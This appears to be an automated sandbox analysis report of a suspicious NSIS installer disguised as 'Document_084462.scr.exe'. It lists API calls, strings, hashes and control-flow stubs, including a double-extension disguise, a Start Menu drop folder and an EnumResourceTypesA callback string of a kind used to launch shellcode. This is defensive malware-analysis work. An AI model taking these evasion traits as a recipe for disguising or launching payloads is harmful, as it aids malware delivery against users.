                                                                              • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                              • String ID: "C:\Users\user\Desktop\Document_084462.scr.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires$C:\Users\user\Desktop$C:\Users\user\Desktop\Document_084462.scr.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$kernel32::EnumResourceTypesA(i 0,i r8,i 0)$~nsu
                                                                              • API String ID: 3441113951-2188450108
                                                                              • Opcode ID: ef7bc40cfc21a65b5c7abadd4c778368bce5dd0c15bdea56e8fa6b9d03db3f5a
                                                                              • Instruction ID: d7b9bf8e5ec5db16f392776339999e6c5d6af7d7718e861a4dfbc7241a8cc938
                                                                              • Opcode Fuzzy Hash: ef7bc40cfc21a65b5c7abadd4c778368bce5dd0c15bdea56e8fa6b9d03db3f5a
                                                                              • Instruction Fuzzy Hash: 65D1F6B1200310AAD7207F659D49B2B3AACEB81749F10843FF581B62D1DB7D8A55C76E

                                                                              Control-flow Graph
                                                                              • Graph entry block: 405595-4055b0 (legend: Executed / Not Executed)
                                                                              APIs
                                                                              • GetDlgItem.USER32(?,00000403), ref: 004055F3
                                                                              • GetDlgItem.USER32(?,000003EE), ref: 00405602
                                                                              • GetClientRect.USER32(?,?), ref: 0040563F
                                                                              • GetSystemMetrics.USER32(00000002), ref: 00405646
                                                                              • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405667
                                                                              • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405678
                                                                              • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040568B
                                                                              • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405699
                                                                              • SendMessageW.USER32(?,00001024,00000000,?), ref: 004056AC
                                                                              • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004056CE
                                                                              • ShowWindow.USER32(?,00000008), ref: 004056E2
                                                                              • GetDlgItem.USER32(?,000003EC), ref: 00405703
                                                                              • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405713
                                                                              • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040572C
                                                                              • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405738
                                                                              • GetDlgItem.USER32(?,000003F8), ref: 00405611
                                                                                • Part of subcall function 00404379: SendMessageW.USER32(00000028,?,?,004041A4), ref: 00404387
                                                                              • GetDlgItem.USER32(?,000003EC), ref: 00405755
                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00005529,00000000), ref: 00405763
                                                                              • CloseHandle.KERNELBASE(00000000), ref: 0040576A
                                                                              • ShowWindow.USER32(00000000), ref: 0040578E
                                                                              • ShowWindow.USER32(?,00000008), ref: 00405793
                                                                              • ShowWindow.USER32(00000008), ref: 004057DD
                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405811
                                                                              • CreatePopupMenu.USER32 ref: 00405822
                                                                              • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405836
                                                                              • GetWindowRect.USER32(?,?), ref: 00405856
                                                                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040586F
                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058A7
                                                                              • OpenClipboard.USER32(00000000), ref: 004058B7
                                                                              • EmptyClipboard.USER32 ref: 004058BD
                                                                              • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004058C9
                                                                              • GlobalLock.KERNEL32(00000000), ref: 004058D3
                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058E7
                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00405907
                                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 00405912
                                                                              • CloseClipboard.USER32 ref: 00405918
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                              • String ID: {
                                                                              • API String ID: 590372296-366298937
                                                                              • Opcode ID: 76257269951a7008dfdc90867c28ba5585546a04cccc1881335d18026b5b47bc
                                                                              • Instruction ID: ce320b3aa05de7a86cd71a66421b7d26801e1fa413e38a053d13c4a4e4f3a794
                                                                              • Opcode Fuzzy Hash: 76257269951a7008dfdc90867c28ba5585546a04cccc1881335d18026b5b47bc
                                                                              • Instruction Fuzzy Hash: 43B15BB1900608FFDB119F64DD89EAE7B79FB44354F00802AFA45B61A0CB794E51DFA8

                                                                              Control-flow Graph
                                                                              • Graph entry block: 405b00-405b26 (legend: Executed / Not Executed)
                                                                              APIs
                                                                              • DeleteFileW.KERNELBASE(?,?,77043420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B29
                                                                              • lstrcatW.KERNEL32(007A3F50,\*.*,007A3F50,?,?,77043420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B71
                                                                              • lstrcatW.KERNEL32(?,0040A014,?,007A3F50,?,?,77043420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B94
                                                                              • lstrlenW.KERNEL32(?,?,0040A014,?,007A3F50,?,?,77043420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B9A
                                                                              • FindFirstFileW.KERNEL32(007A3F50,?,?,?,0040A014,?,007A3F50,?,?,77043420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405BAA
                                                                              • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405C4A
                                                                              • FindClose.KERNEL32(00000000), ref: 00405C59
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                              • String ID: "C:\Users\user\Desktop\Document_084462.scr.exe"$C:\Users\user\AppData\Local\Temp\$P?z$\*.*
                                                                              • API String ID: 2035342205-4003151211
                                                                              • Opcode ID: 9bcf84aa20197a85572e9300232fccf325a3569ae83ff5500f6c5511c7c60933
                                                                              • Instruction ID: d176cfcb2707c6ba555092c79fa60715814496245c058da0d6595325efdb1864
                                                                              • Opcode Fuzzy Hash: 9bcf84aa20197a85572e9300232fccf325a3569ae83ff5500f6c5511c7c60933
                                                                              • Instruction Fuzzy Hash: BE41D530804A15AAEB216B658D89EBF7678EF42715F14813FF801711D2DB7C5E82CE6E

                                                                              Control-flow Graph
                                                                              • Graph entry block: 405456-40546b (legend: Executed / Not Executed)
                                                                              APIs
                                                                              • lstrlenW.KERNEL32(007A0F28,00000000,0079A700,770423A0,?,?,?,?,?,?,?,?,?,0040338D,00000000,?), ref: 0040548E
                                                                              • lstrlenW.KERNEL32(0040338D,007A0F28,00000000,0079A700,770423A0,?,?,?,?,?,?,?,?,?,0040338D,00000000), ref: 0040549E
                                                                              • lstrcatW.KERNEL32(007A0F28,0040338D,0040338D,007A0F28,00000000,0079A700,770423A0), ref: 004054B1
                                                                              • SetWindowTextW.USER32(007A0F28,007A0F28), ref: 004054C3
                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E9
                                                                              • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405503
                                                                              • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405511
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                              • String ID:
                                                                              • API String ID: 2531174081-0
                                                                              • Opcode ID: 0decb5d3bd7311ee25dcb4cac47719bdc9880b480b93dcede20cbb014160680e
                                                                              • Instruction ID: 198c43ce2186877ab3aec1728abe16fb3d15ea5683a6b9ae92d40c5f72e5eea1
                                                                              • Opcode Fuzzy Hash: 0decb5d3bd7311ee25dcb4cac47719bdc9880b480b93dcede20cbb014160680e
                                                                              • Instruction Fuzzy Hash: EC21AF75900518BACB119F65DD44ACFBFB9EF89354F10802AF904B22A1C3798A81CFA8
                                                                              APIs
                                                                              • FindFirstFileW.KERNELBASE(77043420,007A4F98,C:\Users\user\AppData\Local\Temp\nsqE4B5.tmp,00405E14,C:\Users\user\AppData\Local\Temp\nsqE4B5.tmp,C:\Users\user\AppData\Local\Temp\nsqE4B5.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsqE4B5.tmp,C:\Users\user\AppData\Local\Temp\nsqE4B5.tmp,77043420,?,C:\Users\user\AppData\Local\Temp\,00405B20,?,77043420,C:\Users\user\AppData\Local\Temp\), ref: 00406757
                                                                              • FindClose.KERNEL32(00000000), ref: 00406763
                                                                              Strings
                                                                              • C:\Users\user\AppData\Local\Temp\nsqE4B5.tmp, xrefs: 0040674C
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: Find$CloseFileFirst
                                                                              • String ID: C:\Users\user\AppData\Local\Temp\nsqE4B5.tmp
                                                                              • API String ID: 2295610775-2333618704
                                                                              • Opcode ID: 93d274fea3e94b44f6f55b1f097fc665565d90e42f153d0ad468ae4ce1295179
                                                                              • Instruction ID: 5230d556015edc92dacd95909e5542708b333c59f405b635cf09ddc887f28092
                                                                              • Opcode Fuzzy Hash: 93d274fea3e94b44f6f55b1f097fc665565d90e42f153d0ad468ae4ce1295179
                                                                              • Instruction Fuzzy Hash: CCD012315192205FC75027386F0C84B7A599F567353264B36F0AAF21E0C6788C3286AC

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              [Control-flow graph: function at 00403E6B]
                                                                              APIs
                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403EA7
                                                                              • ShowWindow.USER32(?), ref: 00403EC4
                                                                              • DestroyWindow.USER32 ref: 00403ED8
                                                                              • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403EF4
                                                                              • GetDlgItem.USER32(?,?), ref: 00403F15
                                                                              • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403F29
                                                                              • IsWindowEnabled.USER32(00000000), ref: 00403F30
                                                                              • GetDlgItem.USER32(?,?), ref: 00403FDE
                                                                              • GetDlgItem.USER32(?,00000002), ref: 00403FE8
                                                                              • SetClassLongW.USER32(?,000000F2,?), ref: 00404002
                                                                              • SendMessageW.USER32(0000040F,00000000,?,?), ref: 00404053
                                                                              • GetDlgItem.USER32(?,00000003), ref: 004040F9
                                                                              • ShowWindow.USER32(00000000,?), ref: 0040411A
                                                                              • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040412C
                                                                              • EnableWindow.USER32(?,?), ref: 00404147
                                                                              • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 0040415D
                                                                              • EnableMenuItem.USER32(00000000), ref: 00404164
                                                                              • SendMessageW.USER32(?,000000F4,00000000,?), ref: 0040417C
                                                                              • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040418F
                                                                              • lstrlenW.KERNEL32(007A1F48,?,007A1F48,00000000), ref: 004041B9
                                                                              • SetWindowTextW.USER32(?,007A1F48), ref: 004041CD
                                                                              • ShowWindow.USER32(?,0000000A), ref: 00404301
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                              • String ID:
                                                                              • API String ID: 3282139019-0
                                                                              • Opcode ID: f1a328e51306031731dbcce9d1c3737ebdd7014b04a9a2d8d616989602e21706
                                                                              • Instruction ID: fd8a01c06953bfbcdc6c7a7ca4fde1a241a6ed83f8ebcdeac2000881ab9a06ac
                                                                              • Opcode Fuzzy Hash: f1a328e51306031731dbcce9d1c3737ebdd7014b04a9a2d8d616989602e21706
                                                                              • Instruction Fuzzy Hash: 67C1BFB1604604AFDB206F61ED85D2A3B78EBCA705B10853EF651B11F0CB3D9941DB6E

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              [Control-flow graph: function at 00403ABD]
                                                                              APIs
                                                                                • Part of subcall function 004067E3: GetModuleHandleA.KERNEL32(?,00000020,?,00403514,0000000B), ref: 004067F5
                                                                                • Part of subcall function 004067E3: GetProcAddress.KERNEL32(00000000,?), ref: 00406810
                                                                              • GetUserDefaultUILanguage.KERNELBASE(00000002,77043420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Document_084462.scr.exe",00000000), ref: 00403AD7
                                                                                • Part of subcall function 00406335: wsprintfW.USER32 ref: 00406342
                                                                              • lstrcatW.KERNEL32(1033,007A1F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F48,00000000,00000002,77043420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Document_084462.scr.exe",00000000), ref: 00403B3E
                                                                              • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires,1033,007A1F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F48,00000000,00000002,77043420), ref: 00403BBE
                                                                              • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires,1033,007A1F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F48,00000000), ref: 00403BD1
                                                                              • GetFileAttributesW.KERNEL32(Call), ref: 00403BDC
                                                                              • LoadImageW.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires), ref: 00403C25
                                                                              • RegisterClassW.USER32(007A7A00), ref: 00403C62
                                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403C7A
                                                                              • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403CAF
                                                                              • ShowWindow.USER32(00000005,00000000), ref: 00403CE5
                                                                              • GetClassInfoW.USER32(00000000,RichEdit20W,007A7A00), ref: 00403D11
                                                                              • GetClassInfoW.USER32(00000000,RichEdit,007A7A00), ref: 00403D1E
                                                                              • RegisterClassW.USER32(007A7A00), ref: 00403D27
                                                                              • DialogBoxParamW.USER32(?,00000000,00403E6B,00000000), ref: 00403D46
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                                                                              • String ID: "C:\Users\user\Desktop\Document_084462.scr.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                              • API String ID: 606308-4187143652
                                                                              • Opcode ID: ed5882197ad2af45622ab53baadaf8c7f939305731a510e2915a0577b65485f7
                                                                              • Instruction ID: 7ce8ec14a48fa11d69b3a5e1f0875b7083b8d607cd9ed6182ea3b60f82ca9994
                                                                              • Opcode Fuzzy Hash: ed5882197ad2af45622ab53baadaf8c7f939305731a510e2915a0577b65485f7
                                                                              • Instruction Fuzzy Hash: 286193702407007ED320AB669D46F2B3A7CEB85B49F40853FF941B22E2DB7D99018B6D

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              [Control-flow graph: function at 00403015]
                                                                              APIs
                                                                              • GetTickCount.KERNEL32 ref: 00403026
                                                                              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Document_084462.scr.exe,00000400,?,00000007,00000009,0000000B), ref: 00403042
                                                                                • Part of subcall function 00405EE4: GetFileAttributesW.KERNELBASE(?,00403055,C:\Users\user\Desktop\Document_084462.scr.exe,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405EE8
                                                                                • Part of subcall function 00405EE4: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000,?,00000007,00000009,0000000B), ref: 00405F0A
                                                                              • GetFileSize.KERNEL32(00000000,00000000,007B7000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Document_084462.scr.exe,C:\Users\user\Desktop\Document_084462.scr.exe,80000000,00000003,?,00000007,00000009,0000000B), ref: 0040308E
                                                                              • GlobalAlloc.KERNELBASE(00000040,0000000B,?,00000007,00000009,0000000B), ref: 004031C4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                              • String ID: "C:\Users\user\Desktop\Document_084462.scr.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Document_084462.scr.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                              • API String ID: 2803837635-582730717
                                                                              • Opcode ID: 08ca265c2c11c7ade98783a519f9a0a5c073a42a03571b96a4881a179354b053
                                                                              • Instruction ID: b65d07b499067b34cf8ea267e223a71d0fae98adc47698ec1498b1efb03bef53
                                                                              • Opcode Fuzzy Hash: 08ca265c2c11c7ade98783a519f9a0a5c073a42a03571b96a4881a179354b053
                                                                              • Instruction Fuzzy Hash: DD51D171900204ABDB119F64DD85B9E7EACEB45316F20843BE911BA2D1DB7C8F418B5D

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              [Control-flow graph: function at 0040642B]
                                                                              APIs
                                                                              • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 0040656C
                                                                              • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,007A0F28,?,0040548D,007A0F28,00000000), ref: 0040657F
                                                                              • SHGetSpecialFolderLocation.SHELL32(0040548D,0079A700,00000000,007A0F28,?,0040548D,007A0F28,00000000), ref: 004065BB
                                                                              • SHGetPathFromIDListW.SHELL32(0079A700,Call), ref: 004065C9
                                                                              • CoTaskMemFree.OLE32(0079A700), ref: 004065D4
                                                                              • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004065FA
                                                                              • lstrlenW.KERNEL32(Call,00000000,007A0F28,?,0040548D,007A0F28,00000000), ref: 00406652
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                              • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                              • API String ID: 717251189-1230650788
                                                                              • Opcode ID: aaa997f56c542f4584990acf2269000a5d9ad94e2d12eeb77129bcfb95bdb2f4
                                                                              • Instruction ID: 6a9894c1754425a34e634a53c322024ca71031740d406166b65bc8419ebad360
                                                                              • Opcode Fuzzy Hash: aaa997f56c542f4584990acf2269000a5d9ad94e2d12eeb77129bcfb95bdb2f4
                                                                              • Instruction Fuzzy Hash: A261F471600505ABDF249F24DD40ABE37A5AF51318F22813FE543BA2D4DB3D8AA1CB5E

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              APIs
                                                                              • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires,?,?,00000031), ref: 004017B0
                                                                              • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires,?,?,00000031), ref: 004017D5
                                                                                • Part of subcall function 004063EE: lstrcpynW.KERNEL32(?,?,00000400,00403573,007A7A60,NSIS Error,?,00000007,00000009,0000000B), ref: 004063FB
                                                                                • Part of subcall function 00405456: lstrlenW.KERNEL32(007A0F28,00000000,0079A700,770423A0,?,?,?,?,?,?,?,?,?,0040338D,00000000,?), ref: 0040548E
                                                                                • Part of subcall function 00405456: lstrlenW.KERNEL32(0040338D,007A0F28,00000000,0079A700,770423A0,?,?,?,?,?,?,?,?,?,0040338D,00000000), ref: 0040549E
                                                                                • Part of subcall function 00405456: lstrcatW.KERNEL32(007A0F28,0040338D,0040338D,007A0F28,00000000,0079A700,770423A0), ref: 004054B1
                                                                                • Part of subcall function 00405456: SetWindowTextW.USER32(007A0F28,007A0F28), ref: 004054C3
                                                                                • Part of subcall function 00405456: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E9
                                                                                • Part of subcall function 00405456: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405503
                                                                                • Part of subcall function 00405456: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405511
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                              • String ID: C:\Users\user\AppData\Local\Temp\nsqE4B5.tmp$C:\Users\user\AppData\Local\Temp\nsqE4B5.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires$Call
                                                                              • API String ID: 1941528284-954349847
                                                                              • Opcode ID: d08f73f743aae90bf59320a470bb384619887ead500b3c6bbfc993fd6adf6129
                                                                              • Instruction ID: cd03b910d30ecf031e582351f340fed2e2266b195dd1fdcb6122cfe31266ec79
                                                                              • Opcode Fuzzy Hash: d08f73f743aae90bf59320a470bb384619887ead500b3c6bbfc993fd6adf6129
                                                                              • Instruction Fuzzy Hash: 0B418571510508BACF11BFB5CD85DAE3A79EF45329B20423FF422B11E1DB3C8A519A6E

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              APIs
                                                                              • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405968
                                                                              • GetLastError.KERNEL32 ref: 0040597C
                                                                              • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405991
                                                                              • GetLastError.KERNEL32 ref: 0040599B
                                                                              Strings
                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 0040594B
                                                                              • C:\Users\user\Desktop, xrefs: 00405925
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                              • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                                                                              • API String ID: 3449924974-26219170
                                                                              • Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                                                              • Instruction ID: 4c6d3c4ce34384c56ae6b54862a6db5cebbf8231f9905efb0a53c4272bf1951e
                                                                              • Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                                                              • Instruction Fuzzy Hash: E1011AB1C00219EADF009FA5DD44BEFBBB8EF04314F00803AD544B6190E7789648CFA9

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              APIs
                                                                              • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040678A
                                                                              • wsprintfW.USER32 ref: 004067C5
                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004067D9
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                              • String ID: %s%S.dll$UXTHEME$\
                                                                              • API String ID: 2200240437-1946221925
                                                                              • Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                                                              • Instruction ID: 038d7fed81a94acb9f8d17f6b302bf2205b26bc145b48260013954e6d266918a
                                                                              • Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                                                              • Instruction Fuzzy Hash: 65F0F670510119A7CF14AB64DD0DF9B376CAB40309F10047AA646F20D0EB7C9A68CBA8

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: CountTick$wsprintf
                                                                              • String ID: ... %d%%
                                                                              • API String ID: 551687249-2449383134
                                                                              • Opcode ID: 93e44d2671c096b7225e0ed32f8acedc4fb2cb11057b9db1c10a95020cbffac7
                                                                              • Instruction ID: 008436f450556a42ebae23d461066e9f0811e1f15f23a2ec19415b9062137ceb
                                                                              • Opcode Fuzzy Hash: 93e44d2671c096b7225e0ed32f8acedc4fb2cb11057b9db1c10a95020cbffac7
                                                                              • Instruction Fuzzy Hash: 86516C71900219DBDB11DF65DA84B9F7FB8AF0076AF14417BE814B72C1C7789A40CBAA

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 718 405f13-405f1f 719 405f20-405f54 GetTickCount GetTempFileNameW 718->719 720 405f63-405f65 719->720 721 405f56-405f58 719->721 723 405f5d-405f60 720->723 721->719 722 405f5a 721->722 722->723
                                                                              APIs
                                                                              • GetTickCount.KERNEL32 ref: 00405F31
                                                                              • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\Document_084462.scr.exe",004034A0,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036EC), ref: 00405F4C
                                                                              Strings
                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F18
                                                                              • nsa, xrefs: 00405F20
                                                                              • "C:\Users\user\Desktop\Document_084462.scr.exe", xrefs: 00405F13
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Similarity
                                                                              • API ID: CountFileNameTempTick
                                                                              • String ID: "C:\Users\user\Desktop\Document_084462.scr.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                              • API String ID: 1716503409-3143583385
                                                                              • Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                                                              • Instruction ID: 2ec416300cd5d099b763d3688cd3c506487cb406e2025687db32897a35dea38d
                                                                              • Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                                                              • Instruction Fuzzy Hash: 84F09676B00204BBDB008F55ED05E9FB7ACEB95750F10803AEA04F7140E6B499548B58

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
